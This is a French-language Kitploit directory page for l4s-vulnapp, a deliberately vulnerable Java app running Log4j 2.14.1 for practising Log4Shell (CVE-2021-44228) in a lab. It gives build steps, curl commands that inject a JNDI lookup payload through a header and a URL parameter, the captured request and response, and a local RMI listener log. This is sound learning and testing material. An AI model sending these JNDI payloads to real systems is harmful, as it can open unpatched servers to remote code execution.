Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
l4s-vulnapp — Ceci est une application web Java potentiellement vulnérable contenant Log4j affecté par log4shell (CVE-2021-44228). | Kitploit
Outils/GitHubGitHub/ktokkawu/l4s-vulnapp
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubktokkawu/l4s-vulnapp

l4s-vulnapp

Ceci est une application web Java potentiellement vulnérable contenant Log4j affecté par log4shell (CVE-2021-44228).

Voir le dépôt
il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Application vulnérable Log4Shell(l4s-vulnapp)

Il s'agit d'une application web Java potentiellement vulnérable contenant Log4j(2.14.1) affecté par log4shell(CVE-2021-44228).

Environnement vérifié et différentes versions

  • AdoptOpenJDK 17.0.10+7
  • Gradle 8.6
  • Gretty 4.1.2
  • Apache Tomcat 10.1.15
  • Apache Log4j Core 2.14.1

Préparation

  • Téléchargez et extrayez le fichier zip AdoptOpenJDK.
  • Définissez les variables PATH et JAVA_HOME.
  • Exécutez la commande java --version pour vérifier qu'AdoptOpenJDK fonctionne correctement.

[Remarque]
Si vous souhaitez changer la version du JDK, le port Tomcat, etc., modifiez build.gradle.

Compilation et exécution

Exécutez le wrapper Gradle avec build.gradle.

root@kitploit:~
# on Linux
./gradlew appRun

# on Windows
.\gradlew.bat appRun

URL principale :

root@kitploit:~
http://localhost:8080/l4s-vulnapp/

[Remarque]
Log4Shell ne se déclenche que lorsque l'application effectue une journalisation Log4j.
Par exemple, si l'URL suivante est consultée, Log4Shell sera exécuté.

root@kitploit:~
http://localhost:8080/l4s-vulnapp/servlet

Vous pouvez vérifier Log4Shell en modifiant la valeur de "x-param" ou en ajoutant l'en-tête "x-log" à la requête HTTP lors de l'accès.
Ces paramètres seront journalisés par Log4j.
Cependant, cela n'est possible que si un serveur d'écoute est actif sur localhost:8081.

root@kitploit:~
curl http://localhost:8080/l4s-vulnapp/servlet -H 'x-log: ${jndi:rmi://localhost:8081/test.txt}'
curl -X GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D

Résultats de vérification

  • Requête HTTP

    root@kitploit:~
    GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D HTTP/1.1
    Host: localhost:8080
    Connection: keep-alive
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)   Chrome/122.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/  *;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost:8080/l4s-vulnapp/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: ja,en-US;q=0.9,en;q=0.8
    
    
    
  • Réponse HTTP

    root@kitploit:~
    HTTP/1.1 200
    Content-Type: text/plain;charset=utf-8
    Content-Length: 62
    Date: Fri, 15 Mar 2024 18:42:56 GMT
    Keep-Alive: timeout=60
    Connection: keep-alive
    
    Hello
    Logging to console using vulnerable Log4j2 by parameter
    
  • Requête RMI par l4s-vulnapp

    root@kitploit:~
    2024/03/16 03:42:46: [Start] Receive Server for Log4Shell.
    2024/03/16 03:42:46: [Note] Listening on IP: "localhost" Port: 8081
    2024/03/16 03:42:55: [Note] Requested from IP: "127.0.0.1" Port: 53282)
    2024/03/16 03:42:55: [Hex data] ===== start =====
    2024/03/16 03:42:56: 00000000   4A 52 4D 49 00 02 4B 00 00 00 00 00 00 00 00 00  JRMI..K.........
    2024/03/16 03:42:56: 00000010   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    2024/03/16 03:42:56: [Hex data] =====  end  =====
    2024/03/16 03:42:56: [Raw data] ===== start =====
    2024/03/16 03:42:56: JRMI
    2024/03/16 03:42:56: [Raw data] =====  end  =====
    

Option

l4s-ls.ps1 démarre un serveur d'écoute ; exécutez ce script sur Windows PowerShell/Invite de commandes.
Ce serveur reçoit les communications binaires telles que LDAP et RMI, et peut afficher le contenu de ces communications en Hex et en Raw.
Si le script ne fonctionne pas correctement, utilisez Ctrl + C pour l'arrêter.

[Attention]
Lors de la première exécution de ce script, il est nécessaire de sélectionner "Private Network" dans la fenêtre contextuelle de Windows.

root@kitploit:~
PowerShell -ExecutionPolicy RemoteSigned .\l4s-ls.ps1 -p 8081

Références

  • GitHub - tothi/log4shell-vulnerable-app
  • ももいろテクノロジー - PowerShellでnc(netcat)を書いてみる (2015/4/16)
Télécharger l’outil